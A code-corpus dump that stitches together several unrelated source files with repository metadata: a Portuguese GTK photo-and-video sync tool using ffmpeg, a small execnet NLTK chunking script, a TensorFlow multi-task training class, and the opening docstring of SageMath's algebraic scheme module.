global g_dic_info_arquivos_origem
g_dic_info_arquivos_origem = {}
# Monta a lista de arquivos
g_lista_arquivos_origem = [y for x in os.walk(self.edit_origem.get_text()) for y in glob(os.path.join(x[0], '*.*'))]
tamanho = 0
for arquivo in g_lista_arquivos_origem:
try:
# Carrega a informação do arquivo
g_dic_info_arquivos_origem[arquivo] = self.get_file_info(arquivo)
tamanho = tamanho + os.stat(arquivo).st_size # in bytes
except:
debug("Falha ao ler o arquivo de origem " + arquivo)
self.labelStatusFrom.set_text("Arquivos no diretório de origem: " + str(len(g_lista_arquivos_origem)) + " (" + to_human_size(tamanho) + ")")
debug(self.labelStatusFrom.get_text())
g_leitura_origem_finalizada = True
self.do_monta_lista_arquivos()
debug("Consulta da lista de arquivos de origem concluída")
def do_read_file_list_destino(self):
global g_leitura_destino_finalizada
global g_lista_arquivos_destino
g_lista_arquivos_destino = {}
lista_arquivos_destino = [y for x in os.walk(self.edit_destino.get_text()) for y in glob(os.path.join(x[0], '*.*'))]
tamanho = 0
for arquivo in lista_arquivos_destino:
try:
tamanho = tamanho + os.stat(arquivo).st_size # in bytes
nome = os.path.basename(arquivo)
arquivos = g_lista_arquivos_destino.get(nome, [])
arquivos.append(arquivo)
g_lista_arquivos_destino[nome] = arquivos
except:
debug("Falha ao ler o arquivo de destino " + arquivo)
self.labelStatusTo.set_text("Arquivos no diretório de destino: " + str(len(lista_arquivos_destino)) + " (" + to_human_size(tamanho) + ")")
debug(self.labelStatusTo.get_text())
g_leitura_destino_finalizada = True
self.do_monta_lista_arquivos()
debug("Consulta da lista de arquivos de destino concluída")
def do_click_check_files(self, widget): # @UnusedVariable
debug("Validando os diretórios")
if not os.path.isdir(self.edit_origem.get_text()):
return show_message("Diretório inexistente", "Não foi possível encontrar o diretório de origem.")
if not os.path.isdir(self.edit_destino.get_text()):
return show_message("Diretório inexistente", "Não foi possível encontrar o diretório de destino.")
debug("Verificando a lista de arquivos")
global g_lista_arquivos_origem
global g_lista_arquivos_destino
global g_leitura_origem_finalizada
global g_leitura_destino_finalizada
global g_dic_mapeamento_dir_origem
global g_dic_mapeamento_dir_destino
g_lista_arquivos_origem = []
g_lista_arquivos_destino = {}
g_leitura_origem_finalizada = False
g_leitura_destino_finalizada = False
g_dic_mapeamento_dir_origem = {}
g_dic_mapeamento_dir_destino = {}
# Desabilita os botões
self.button_ler_arquivos.set_sensitive(False)
self.button_sync_arquivos.set_sensitive(False)
self.button_mapeamento.set_sensitive(False)
self.store.clear()
# Thread(target=self.do_read_file_list_origem).start()
# Thread(target=self.do_read_file_list_destino).start()
# Compara a lista de arquivos da origem com o destino
self.do_read_file_list_origem()
self.do_read_file_list_destino()
def do_atualiza_contador_selecao(self):
cont = 0
cont_video = 0
cont_foto = 0
cont_outro = 0
size = 0
size_video = 0
size_foto = 0
size_outro = 0
for row in self.store:
if row[0]:
arquivo = self.edit_origem.get_text() + os.sep + row[2]
cont += 1
size += os.stat(arquivo).st_size
if self.is_video(arquivo):
cont_video += 1
size_video += os.stat(arquivo).st_size
elif self.is_foto(arquivo):
cont_foto += 1
size_foto += os.stat(arquivo).st_size
else:
cont_outro += 1
size_outro += os.stat(arquivo).st_size
self.label_status_copia.set_text("Arquivos selecionados: " + str(cont) + " / " + str(len(self.store)) + " (" + to_human_size(size) + ") - Videos: " +
str(cont_video) + " (" + to_human_size(size_video) + ") - Fotos: " + str(cont_foto) + " (" + to_human_size(size_foto) + ") - Outros: " + str(cont_outro) + "(" + to_human_size(size_outro) + ")")
def do_monta_lista_arquivos_copiar(self):
resp = []
path_base = self.edit_origem.get_text()
for row in self.store:
if row[0]:
resp.append(path_base + os.sep + row[2])
return resp
def is_video(self, arquivo):
for ext in get_app_settings("extensoes_video").split('|'):
if arquivo.lower().endswith(ext.lower()):
return True
return False
def is_foto(self, arquivo):
for ext in get_app_settings("extensoes_foto").split('|'):
if arquivo.lower().endswith(ext.lower()):
return True
return False
def do_obter_lista_fotos(self, videos):
resp = []
for arquivo in videos:
if self.is_foto(arquivo):
resp.append(arquivo)
return resp
def do_obter_lista_videos(self, arquivos):
resp = []
for arquivo in arquivos:
if self.is_video(arquivo):
resp.append(arquivo)
return resp
def do_click_mapeamento_dir(self, widget): # @UnusedVariable
debug("Mapeamento de diretórios")
global g_dic_mapeamento_dir_origem
g_dic_mapeamento_dir_origem = {}
global g_dic_mapeamento_dir_destino
g_dic_mapeamento_dir_destino = {}
for arquivo in self.do_monta_lista_arquivos_copiar():
destino = os.path.dirname(get_destino_arquivo(arquivo))
g_dic_mapeamento_dir_destino[destino] = destino
g_dic_mapeamento_dir_origem[destino] = os.path.basename(os.path.dirname(arquivo))
if MapeamentoDialog(main_window).show_and_update_file_list():
self.do_monta_lista_arquivos()
def do_click_sync_files(self, widget): # @UnusedVariable
debug("Montando a lista dos arquivos que serão copiados")
# Recupera a lista de arquivos selecionados
arquivos = self.do_monta_lista_arquivos_copiar()
# Filtra apenas videos e fotos
if 'True' == get_app_settings("apenas_fotos_e_videos"):
debug("Filtrando apenas videos e fotos")
medias = self.do_obter_lista_fotos(arquivos)
medias.extend(self.do_obter_lista_videos(arquivos))
arquivos = medias
debug("Iniciando a cópia dos arquivos")
# Efetua a cópia dos arquivos
dialog_arquivos = FileCopyProgressDialog(main_window, arquivos, self.edit_destino.get_text())
dialog_arquivos.run()
dialog_arquivos.must_stop = True
if dialog_arquivos.failed:
show_message("Falha na cópia dos arquivos!", "Ocorreram falhas durante a cópia de pelo menos um arquivo, verifique o log para mais informações.")
dialog_arquivos.destroy()
debug("Cópia dos arquivos finalizada")
# Verifica se deve recomprimir os videos
if 'True' == get_app_settings("recodificar_videos"):
debug("Montando a lista de videos a serem compactados")
arquivos = self.do_obter_lista_videos(arquivos)
if len(arquivos) > 0:
debug("Compactando " + str(len(arquivos)) + " video(s).")
# Salva o STDOUT para o caso do ffmpeg ser interrompido
saved_stdout = sys.stdout
# Efetua a cópia dos arquivos
dialog_video = VideoEncodeProgressDialog(main_window, arquivos, self.edit_destino.get_text(),)
dialog_video.run()
# Força a interrupção da conversão caso o usuário pressione cancel
dialog_video.must_stop = True
if dialog_video.failed:
show_message("Falha na conversão!", "Ocorreram falhas durante a conversão de pelo menos uma video, verifique o log para mais informações.")
global g_processo_ffmpeg
if g_processo_ffmpeg is not None:
try:
g_processo_ffmpeg.kill()
debug("O processo do ffmpeg foi interrompido pelo usuário.")
except OSError:
debug("O processo do ffmpeg foi finalizado com sucesso.")
dialog_video.destroy()
debug("Codificação dos vídeos finalizada")
# Retorna o STDOUT original
sys.stdout = saved_stdout
show_message("Concluído!", "Operação de cópia dos arquivos finalizada!")
def do_click_config(self, widget): # @UnusedVariable
debug("Configurando a aplicação")
ConfigDialog(main_window).show_and_get_info()
def do_click_logs(self, widget): # @UnusedVariable
debug("Visualizando os logs")
LogViewerDialog(main_window).show_and_get_info()
def do_click_close(self, widget): # @UnusedVariable
on_close(None, None)
def on_tree_double_clicked(self, widget, row, col): # @UnusedVariable
debug("Duplo click na lista de arquivos (" + str(row) + "," + str(col.get_sort_column_id()) + ")")
select = self.treeview.get_selection()
model, treeiter = select.get_selected()
self.store.set_value(treeiter, 0, not model[treeiter][0])
self.do_atualiza_contador_selecao()
def get_file_info(self, arquivo):
captureInfo = 'True' == get_app_settings("exibir_resolucao_arquivos")
if not captureInfo or not self.is_foto(arquivo) and not self.is_video(arquivo):
return ""
pattern = re.compile("(Duration: [0-9]{2,}:[0-9]{2,}:[0-9]{2,})|(Video: [^\s]+)|([0-9]{2,}x[0-9]{2,})|([0-9|.]+ fps)|(Audio: [^\s]+)|([0-9]+ Hz)")
args = [get_caminho_ffmpeg(), "-hide_banner", "-i", arquivo]
global g_processo_ffmpeg
g_processo_ffmpeg = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1, universal_newlines=True)
lines = ""
# Inicia o processo e concatena as linhas do output
for line in iter(g_processo_ffmpeg.stdout.readline, ''):
# Considera apenas as linhas essenciais
if line.find("Stream #0") or line.find(" Duration:"):
lines = lines + line
if "Duration: 00:00:00" in lines:
lines = lines.replace("Duration: 00:00:00", "")
lines = lines.replace("Video: ", "")
# Recupera o texto dos grupos da regex
resp = ""
for m in pattern.finditer(lines):
resp = resp + m.group() + " "
# Finaliza o processo do ffmpeg
g_processo_ffmpeg.stdout.close()
g_processo_ffmpeg.wait()
return resp
def get_destino_arquivo(arquivo):
global g_dic_mapeamento_dir_destino
g_dic_mapeamento_dir_destino = {} if g_dic_mapeamento_dir_destino is None else g_dic_mapeamento_dir_destino
nome = os.path.basename(arquivo)
data = datetime.datetime.fromtimestamp(os.path.getmtime(arquivo))
# Destino: /YYYY/yyyy-MM-dd/arquivo
destino = str(data.year) + os.sep + str(data.year) + "-" + str(data.month).zfill(2) + "-" + str(data.day).zfill(2)
if destino in g_dic_mapeamento_dir_destino:
destino = g_dic_mapeamento_dir_destino[destino]
return destino + os.sep + nome
def create_icon_and_label_button(label, icon):
"""
Cria um botão com um ícone e um texto
"""
debug("Criando botão: " + label)
button = Gtk.Button.new()
grid = Gtk.Grid()
grid.set_column_spacing(6)
grid.attach(Gtk.Image.new_from_icon_name(icon, Gtk.IconSize.LARGE_TOOLBAR), 0, 0, 1, 1)
grid.attach(Gtk.Label(label=label, halign=Gtk.Align.CENTER), 1, 0, 1, 1)
grid.show_all()
button.add(grid)
return button
def compareTreeItem(model, row1, row2, user_data): # @UnusedVariable
"""
Compara 2 ítens de uma tree
"""
sort_column, _ = model.get_sort_column_id()
value1 = model.get_value(row1, sort_column)
value2 = model.get_value(row2, sort_column)
if value1 < value2:
return -1
elif value1 == value2:
return 0
else:
return 1
def show_message(titulo, msg):
"""
Exibe um Dialog de aviso
"""
debug("Exibindo dialog: " + titulo + " - " + msg)
global main_window
dialog = Gtk.MessageDialog(main_window, 0, Gtk.MessageType.INFO, Gtk.ButtonsType.CLOSE, titulo)
dialog.format_secondary_text(msg)
dialog.run()
dialog.destroy()
return None
def indent_xml(elem, level=0):
"""
Formata um arquivo XML
"""
i = "\n" + level * "\t"
if len(elem):
if not elem.text or not elem.text.strip():
elem.text = i + "\t"
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
indent_xml(elem, level + 1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
def set_app_settings(xml_tag, value):
"""
Salva uma configuração da aplicação
"""
debug("Salvando configuração da aplicação: " + xml_tag + " = " + value)
if not os.path.isfile(ARQUIVO_XML_SETTINGS):
indent_and_save_xml(ET.Element('config'), ARQUIVO_XML_SETTINGS)
config_tree = ET.parse(ARQUIVO_XML_SETTINGS, ET.XMLParser(remove_comments=False, strip_cdata=False))
root = config_tree.getroot()
# Remove o nó se já existir
if config_tree.find("./" + xml_tag) is not None:
root.remove(config_tree.find("./" + xml_tag))
# Se o valor não for nulo, adicionar o novo nó
if value is not None and value.strip():
ET.SubElement(root, xml_tag).text = value
indent_and_save_xml(config_tree.getroot(), ARQUIVO_XML_SETTINGS)
def get_app_settings(xml_tag):
"""
Recupera uma configuração da aplicação
"""
node_caminho = ET.parse(ARQUIVO_XML_SETTINGS, ET.XMLParser(remove_comments=False, strip_cdata=False)).find("./" + xml_tag)
return None if node_caminho is None else node_caminho.text
def indent_and_save_xml(root_node, arquivo_xml):
"""
Formata e salva um arquivo XML
"""
debug("Salvando o arquivo XML: " + arquivo_xml)
indent_xml(root_node)
pretty_xml = ET.tostring(root_node, encoding="UTF-8", method="xml", xml_declaration=True)
arquivo = open(arquivo_xml, "wb")
arquivo.write(pretty_xml)
arquivo.close()
def debug(msg=''):
"""
Loga uma mensagem
"""
try:
linha = str(msg).strip()
except (UnicodeEncodeError):
linha = msg.encode("utf-8").strip()
g_logger.debug(linha)
def to_human_size(nbytes):
"""
Converte uma quantidade de bytes em formato de fácil visualização
"""
human = nbytes
rank = 0
if nbytes != 0:
rank = int((math.log10(nbytes)) / 3)
rank = min(rank, len(UNIDADES) - 1)
human = nbytes / (1024.0 ** rank)
f = ('%.2f' % human).rstrip('0').rstrip('.')
return '%s %s' % (f, UNIDADES[rank])
def on_close(self, widget): # @UnusedVariable
"""
Fecha a aplicação, liberando o FileHandler do log
"""
logHandler.close()
g_logger.removeHandler(logHandler)
sys.exit()
def get_codec_info(codec):
"""
Recupera os parâmtros do ffmpeg para conversão
"""
resp = None
if VIDEO_H265 == codec:
resp = {"params":["-c:v", "libx265", "-acodec", "aac", "-strict", "-2"], "sufixo":"_H265.mp4"}
elif VIDEO_H264 == codec:
resp = {"params":["-c:v", "libx264", "-acodec", "aac", "-strict", "-2"], "sufixo":"_H264.mp4"}
elif VIDEO_VP8 == codec:
resp = {"params":["-c:v", "libvpx", "-b:v", "1M", "-c:a", "libvorbis"], "sufixo":"_VP8.webm"}
elif VIDEO_VP9 == codec:
resp = {"params":["-c:v", "libvpx-vp9", "-b:v", "2M", "-c:a", "libopus"], "sufixo":"_VP9.webm"}
return resp
def get_caminho_ffmpeg():
"""
Recupera o caminho onde o ffmpeg está instalado
"""
app = get_app_settings("caminho_ffmpeg")
return app if app is not None else "ffmpeg"
def get_ffmpeg_features():
"""
Recupera uma lista com as features do ffmpeg: Ex: --enable-libx264
"""
global g_lista_ffmpeg_features
if g_lista_ffmpeg_features is None:
g_processo_ffmpeg = subprocess.Popen([get_caminho_ffmpeg()], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1, universal_newlines=True)
linhas = ""
for line in iter(g_processo_ffmpeg.stdout.readline, ''):
if "--" in line:
linhas = linhas + line
g_processo_ffmpeg.stdout.close()
g_processo_ffmpeg.wait()
g_lista_ffmpeg_features = []
pattern = re.compile("--enable-[^\s]+|disable-[^\s]+")
for m in pattern.finditer(linhas):
g_lista_ffmpeg_features.append(m.group())
return g_lista_ffmpeg_features
# Constantes da aplicação
VERSAO_APPLICACAO = "v1.0" # Versão da aplicação
UNIDADES = ['B', 'KB', 'MB', 'GB', 'TB', 'PB'] # Unidades de conversão bytes -> Si
DIR_APPLICATION = os.path.dirname(os.path.realpath(__file__)) # Diretório da aplicação
ARQUIVO_XML_SETTINGS = DIR_APPLICATION + os.sep + "settings.xml" # Arquivo de configuração da aplicação
ARQUIVO_LOG = DIR_APPLICATION + os.sep + "application.log" # Arquivo de log
# Codecs de Video
VIDEO_H265 = "Video H265"
VIDEO_H264 = "Video H264"
VIDEO_VP8 = "Video VP8"
VIDEO_VP9 = "Video VP9"
CODECS_VIDEO = []
# Variáveis globais da aplicação
# Nota: por convenção, as variáveis globais são camelCase e iniciam com um 'g'
g_debug_mode = False # True para exibir mensagens de debug
# Controle do ffmpeg
g_processo_ffmpeg = None # Representa a instância do processo do ffmpeg
g_lista_ffmpeg_features = None # Dicionário com as features de compilação do ffmpeg
# Variáveis dos arquivos de origem
g_leitura_origem_finalizada = False # Sinaliza o fim da thread de leitura de arquivos de origem
g_lista_arquivos_origem = None # Lista de arquivos no diretório de origem
g_dic_info_arquivos_origem = None # Dicionário com informações sobre os arquivos
# Variáveis dos arquivos de destino
g_leitura_destino_finalizada = False # Sinaliza o fim da thread de leitura de arquivos de destino
g_lista_arquivos_destino = None # Lista de arquivos no diretório de destino
g_dic_mapeamento_dir_destino = {} # Mapeamento dos diretórios de destino
g_dic_mapeamento_dir_origem = {} # Mapeamento dos diretórios de origem
# Remove o arquivo de log anterior e cria o g_logger
if os.path.isfile(ARQUIVO_LOG):
os.remove(ARQUIVO_LOG)
logging.basicConfig(level=logging.DEBUG, format='%(asctime)-15s %(message)s')
logHandler = logging.FileHandler(ARQUIVO_LOG)
g_logger = logging.getLogger('-') # Logger da aplicação
g_logger.addHandler(logHandler)
# Lê os parâmetros da aplicação
try:
opts, args = getopt.getopt(sys.argv[1:], "h", [])
except getopt.GetoptError:
print('photosync.py -h (help)')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print("\nPrograma para sincronização de arquivos")
print("\nUso: photosync.py -h (help)")
print("\nExemplo: ./photosync.py")
sys.exit()
# Força UTF-8 por padrão
if sys.version_info < (3, 0):
reload(sys)
sys.setdefaultencoding("utf-8")
if not os.path.isfile(ARQUIVO_XML_SETTINGS):
set_app_settings("dir_destino", str(os.path.expanduser('~')))
set_app_settings("dir_origem", str(os.path.expanduser('~')))
set_app_settings("extensoes_video", "wmv|avi|mpg|3gp|mov|m4v|mts|mp4")
set_app_settings("extensoes_foto", "dof|arw|raw|jpg|jpeg|png|nef")
set_app_settings("codec_video", "0")
set_app_settings("caminho_ffmpeg", "ffmpeg")
main_window = MainWindow()
# Verifica a presença do ffmpeg
if not spawn.find_executable(get_caminho_ffmpeg()):
info = InputDialog(main_window, 'Informe o caminho para o ffmpeg', '', None).show_and_get_info()
if info is None or not spawn.find_executable(info):
print("Não foi possível encontrar o aplicativo necessário ffmpeg.")
print("Verifique a configuração do caminho do ffmpeg no arquivo settings.xml")
print("A configuração atual é: " + get_caminho_ffmpeg())
sys.exit(2)
else:
set_app_settings("caminho_ffmpeg", info)
# Exibe as aopções de codec de acordo com a disponibilidade do ffmpeg
if "--enable-libx264" in get_ffmpeg_features():
CODECS_VIDEO.append(VIDEO_H264)
if "--enable-libx265" in get_ffmpeg_features():
CODECS_VIDEO.append(VIDEO_H265)
if "--enable-libvpx" in get_ffmpeg_features():
CODECS_VIDEO.append(VIDEO_VP8)
CODECS_VIDEO.append(VIDEO_VP9)
# Calling GObject.threads_init() is not needed for PyGObject 3.10.2+
GObject.threads_init()
# Monta a UI
main_window.connect('delete-event', on_close)
main_window.show_all()
Gtk.main()
| 38.100866 | 234 | 0.625392 |
4a1b5ba7038cada01ca5630ec897fd02f2afb5a3
| 233 |
py
|
Python
|
Module 2/Chapter 8/7853OS_08_Codes/remote_chunk.py
|
PacktPublishing/Natural-Language-Processing-Python-and-NLTK
|
bb7fd9a3071b4247d13accfbf0a48eefec76e925
|
[
"MIT"
] | 50 |
2016-12-11T13:49:01.000Z
|
2022-03-20T19:47:55.000Z
|
Module 2/Chapter 8/7853OS_08_Codes/remote_chunk.py
|
PacktPublishing/Natural-Language-Processing-Python-and-NLTK
|
bb7fd9a3071b4247d13accfbf0a48eefec76e925
|
[
"MIT"
] | null | null | null |
Module 2/Chapter 8/7853OS_08_Codes/remote_chunk.py
|
PacktPublishing/Natural-Language-Processing-Python-and-NLTK
|
bb7fd9a3071b4247d13accfbf0a48eefec76e925
|
[
"MIT"
] | 40 |
2017-06-14T14:02:48.000Z
|
2021-10-14T06:25:00.000Z
|
import pickle
if __name__ == '__channelexec__':
tagger = pickle.loads(channel.receive())
chunker = pickle.loads(channel.receive())
for sent in channel:
tree = chunker.parse(tagger.tag(sent))
channel.send(pickle.dumps(tree))
| 25.888889 | 42 | 0.733906 |
4a1b5d07bf6c0d2356b8046f15eac4953e561f64
| 5,938 |
py
|
Python
|
official/modeling/multitask/multitask.py
|
wnorris/models
|
a5e4965d1f4e4b02d51aa344336b6fff53af7c17
|
[
"Apache-2.0"
] | 1 |
2020-09-14T10:46:07.000Z
|
2020-09-14T10:46:07.000Z
|
official/modeling/multitask/multitask.py
|
wnorris/models
|
a5e4965d1f4e4b02d51aa344336b6fff53af7c17
|
[
"Apache-2.0"
] | null | null | null |
official/modeling/multitask/multitask.py
|
wnorris/models
|
a5e4965d1f4e4b02d51aa344336b6fff53af7c17
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2022 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Experimental MultiTask base class for multi-task training/evaluation."""
import abc
from typing import Dict, List, Optional, Text, Union
import tensorflow as tf
from official.core import base_task
from official.core import config_definitions
from official.core import task_factory
from official.modeling import optimization
from official.modeling.multitask import base_model
from official.modeling.multitask import configs
from official.modeling.privacy import configs as dp_configs
OptimizationConfig = optimization.OptimizationConfig
RuntimeConfig = config_definitions.RuntimeConfig
DifferentialPrivacyConfig = dp_configs.DifferentialPrivacyConfig
class MultiTask(tf.Module, metaclass=abc.ABCMeta):
"""A multi-task class to manage multiple tasks."""
def __init__(self,
tasks: Union[Dict[Text, base_task.Task], List[base_task.Task]],
task_weights: Optional[Dict[str, Union[float, int]]] = None,
task_eval_steps: Optional[Dict[str, int]] = None,
name: Optional[str] = None):
"""MultiTask initialization.
Args:
tasks: a list or a flat dict of Task.
task_weights: a dict of (task, task weight), task weight can be applied
directly during loss summation in a joint backward step, or it can be
used to sample task among interleaved backward step.
task_eval_steps: a dict of (task, eval steps).
name: the instance name of a MultiTask object.
"""
super().__init__(name=name)
if isinstance(tasks, list):
self._tasks = {}
for task in tasks:
if task.name in self._tasks:
raise ValueError("Duplicated tasks found, task.name is %s" %
task.name)
self._tasks[task.name] = task
elif isinstance(tasks, dict):
self._tasks = tasks
else:
raise ValueError("The tasks argument has an invalid type: %s" %
type(tasks))
self.task_eval_steps = task_eval_steps or {}
self._task_weights = task_weights or {}
self._task_weights = dict([
(name, self._task_weights.get(name, 1.0)) for name in self.tasks
])
@classmethod
def from_config(cls, config: configs.MultiTaskConfig, logging_dir=None):
tasks = {}
task_eval_steps = {}
task_weights = {}
for task_routine in config.task_routines:
task_name = task_routine.task_name or task_routine.task_config.name
tasks[task_name] = task_factory.get_task(
task_routine.task_config, logging_dir=logging_dir, name=task_name)
task_eval_steps[task_name] = task_routine.eval_steps
task_weights[task_name] = task_routine.task_weight
return cls(
tasks, task_eval_steps=task_eval_steps, task_weights=task_weights)
@property
def tasks(self):
return self._tasks
def task_weight(self, task_name):
return self._task_weights[task_name]
@property
def task_weights(self):
return self._task_weights
@classmethod
def create_optimizer(cls,
optimizer_config: OptimizationConfig,
runtime_config: Optional[RuntimeConfig] = None,
dp_config: Optional[DifferentialPrivacyConfig] = None):
return base_task.Task.create_optimizer(
optimizer_config=optimizer_config, runtime_config=runtime_config,
dp_config=dp_config)
def joint_train_step(self, task_inputs,
multi_task_model: base_model.MultiTaskBaseModel,
optimizer: tf.keras.optimizers.Optimizer, task_metrics,
**kwargs):
"""The joint train step.
Args:
task_inputs: a dictionary of task names and per-task features.
multi_task_model: a MultiTaskBaseModel instance.
optimizer: a tf.optimizers.Optimizer.
task_metrics: a dictionary of task names and per-task metrics.
**kwargs: other arguments to pass through.
Returns:
A dictionary of losses, inculding per-task losses and their weighted sum.
"""
losses = {}
with tf.GradientTape() as tape:
total_loss = 0.0
for name, model in multi_task_model.sub_tasks.items():
inputs = task_inputs[name]
if isinstance(inputs, tuple) and len(inputs) == 2:
features, labels = inputs
elif isinstance(inputs, dict):
features, labels = inputs, inputs
else:
raise ValueError("The iterator output is neither a tuple nor a "
"dictionary. It is not implemented to support "
"such outputs.")
outputs = model(features, training=True)
task_loss = self.tasks[name].build_losses(labels, outputs)
task_weight = self.task_weight(name)
total_loss += task_weight * task_loss
losses[name] = task_loss
self.tasks[name].process_metrics(task_metrics[name], labels, outputs,
**kwargs)
# Scales loss as the default gradients allreduce performs sum inside
# the optimizer.
scaled_loss = total_loss / tf.distribute.get_strategy(
).num_replicas_in_sync
tvars = multi_task_model.trainable_variables
grads = tape.gradient(scaled_loss, tvars)
optimizer.apply_gradients(list(zip(grads, tvars)))
losses["total_loss"] = total_loss
return losses
| 39.586667 | 79 | 0.683563 |
4a1b5de0c045030eb3f74ad30b38cdfd4bc7a759
| 556 |
py
|
Python
|
create_linear_topo.py
|
kboutarel/DAMIT
|
dcf8350d2afc76c84831ff42bf95bd9992df35c5
|
[
"Apache-2.0"
] | 5 |
2017-12-30T12:11:08.000Z
|
2021-01-16T01:28:12.000Z
|
create_linear_topo.py
|
kboutarel/DAMIT
|
dcf8350d2afc76c84831ff42bf95bd9992df35c5
|
[
"Apache-2.0"
] | 4 |
2017-12-31T12:17:52.000Z
|
2018-04-23T16:28:50.000Z
|
create_linear_topo.py
|
kboutarel/DAMIT
|
dcf8350d2afc76c84831ff42bf95bd9992df35c5
|
[
"Apache-2.0"
] | 5 |
2017-03-22T22:29:27.000Z
|
2018-12-15T15:12:38.000Z
|
#!/usr/bin/env python2
import sys
def write_topo(num_switches):
with open("topo.txt", "w") as t:
t.write("switches %d\n" % num_switches)
t.write("outer_hosts 1\n")
t.write("inner_hosts 1\n")
for i in xrange(1, num_switches+1):
if i == 1:
t.write("o1 s1\n")
if i == num_switches:
t.write("s%s i1\n" % i)
else:
t.write("s%s s%s\n" % (i, i+1))
if __name__ == "__main__":
num_switches = int(sys.argv[1])
write_topo(num_switches)
| 26.47619 | 47 | 0.510791 |
4a1b5e9b03d05d46da6e028167127b63cdb9b5d5
| 76,619 |
py
|
Python
|
src/sage/schemes/generic/algebraic_scheme.py
|
Ivo-Maffei/DistanceRegular
|
d4dedd5c3e7da73111168fcce60d1f180fe24019
|
[
"BSL-1.0"
] | 1 |
2020-05-19T22:34:03.000Z
|
2020-05-19T22:34:03.000Z
|
src/sage/schemes/generic/algebraic_scheme.py
|
Ivo-Maffei/DistanceRegular
|
d4dedd5c3e7da73111168fcce60d1f180fe24019
|
[
"BSL-1.0"
] | null | null | null |
src/sage/schemes/generic/algebraic_scheme.py
|
Ivo-Maffei/DistanceRegular
|
d4dedd5c3e7da73111168fcce60d1f180fe24019
|
[
"BSL-1.0"
] | 3 |
2020-03-29T17:13:36.000Z
|
2021-05-03T18:11:28.000Z
|
r"""
Algebraic schemes
An algebraic scheme is defined by a set of polynomials in some
suitable affine or projective coordinates. Possible ambient spaces are
* Affine spaces (:class:`AffineSpace
<sage.schemes.affine.affine_space.AffineSpace_generic>`),
* Projective spaces (:class:`ProjectiveSpace
<sage.schemes.projective.projective_space.ProjectiveSpace_ring>`), or
* Toric varieties (:class:`ToricVariety
<sage.schemes.toric.variety.ToricVariety_field>`).
Note that while projective spaces are of course toric varieties themselves,
they are implemented differently in Sage due to efficiency considerations.
You still can create a projective space as a toric variety if you wish.
In the following, we call the corresponding subschemes affine
algebraic schemes, projective algebraic schemes, or toric algebraic
schemes. In the future other ambient spaces, perhaps by means of
gluing relations, may be introduced.
Generally, polynomials `p_0, p_1, \dots, p_n` define an ideal
`I=\left<p_0, p_1, \dots, p_n\right>`. In the projective and toric case, the
polynomials (and, therefore, the ideal) must be homogeneous. The
associated subscheme `V(I)` of the ambient space is, roughly speaking,
the subset of the ambient space on which all polynomials vanish simultaneously.
.. WARNING::
You should not construct algebraic scheme objects directly. Instead, use
``.subscheme()`` methods of ambient spaces. See below for examples.
EXAMPLES:
We first construct the ambient space, here the affine space `\QQ^2`::
sage: A2 = AffineSpace(2, QQ, 'x, y')
sage: A2.coordinate_ring().inject_variables()
Defining x, y
Now we can write polynomial equations in the variables `x` and `y`. For
example, one equation cuts out a curve (a one-dimensional subscheme)::
sage: V = A2.subscheme([x^2+y^2-1]); V
Closed subscheme of Affine Space of dimension 2
over Rational Field defined by:
x^2 + y^2 - 1
sage: V.dimension()
1
Here is a more complicated example in a projective space::
sage: P3 = ProjectiveSpace(3, QQ, 'x')
sage: P3.inject_variables()
Defining x0, x1, x2, x3
sage: Q = matrix([[x0, x1, x2], [x1, x2, x3]]).minors(2); Q
[-x1^2 + x0*x2, -x1*x2 + x0*x3, -x2^2 + x1*x3]
sage: twisted_cubic = P3.subscheme(Q)
sage: twisted_cubic
Closed subscheme of Projective Space of dimension 3
over Rational Field defined by:
-x1^2 + x0*x2,
-x1*x2 + x0*x3,
-x2^2 + x1*x3
sage: twisted_cubic.dimension()
1
Note that there are 3 equations in the 3-dimensional ambient space,
yet the subscheme is 1-dimensional. One can show that it is not
possible to eliminate any of the equations, that is, the twisted cubic
is **not** a complete intersection of two polynomial equations.
Let us look at one affine patch, for example the one where `x_0=1` ::
sage: patch = twisted_cubic.affine_patch(0)
sage: patch
Closed subscheme of Affine Space of dimension 3
over Rational Field defined by:
-x1^2 + x2,
-x1*x2 + x3,
-x2^2 + x1*x3
sage: patch.embedding_morphism()
Scheme morphism:
From: Closed subscheme of Affine Space of dimension 3
over Rational Field defined by:
-x1^2 + x2,
-x1*x2 + x3,
-x2^2 + x1*x3
To: Closed subscheme of Projective Space of dimension 3
over Rational Field defined by:
x1^2 - x0*x2,
x1*x2 - x0*x3,
x2^2 - x1*x3
Defn: Defined on coordinates by sending (x1, x2, x3) to
(1 : x1 : x2 : x3)
AUTHORS:
- David Kohel (2005): initial version.
- William Stein (2005): initial version.
- Andrey Novoseltsev (2010-05-17): subschemes of toric varieties.
- Volker Braun (2010-12-24): documentation of schemes and
refactoring. Added coordinate neighborhoods and is_smooth()
- Ben Hutz (2014): subschemes of Cartesian products of projective space
- Ben Hutz (2017): split subschemes types into respective folders
"""
from __future__ import absolute_import
# ****************************************************************************
# Copyright (C) 2010 Volker Braun <vbraun.name@gmail.com>
# Copyright (C) 2005 David Kohel <kohel@maths.usyd.edu.au>
# Copyright (C) 2010 Andrey Novoseltsev <novoselt@gmail.com>
# Copyright (C) 2005 William Stein <wstein@gmail.com>
#
# Distributed under the terms of the GNU General Public License (GPL)
# as published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
# https://www.gnu.org/licenses/
# ****************************************************************************
#*** A quick overview over the class hierarchy:
# class AlgebraicScheme(scheme.Scheme)
# class AlgebraicScheme_subscheme
# class AlgebraicScheme_subscheme_affine
# class AlgebraicScheme_subscheme_projective
# class AlgebraicScheme_subscheme_toric
# class AlgebraicScheme_subscheme_affine_toric
# class AlgebraicScheme_quasi
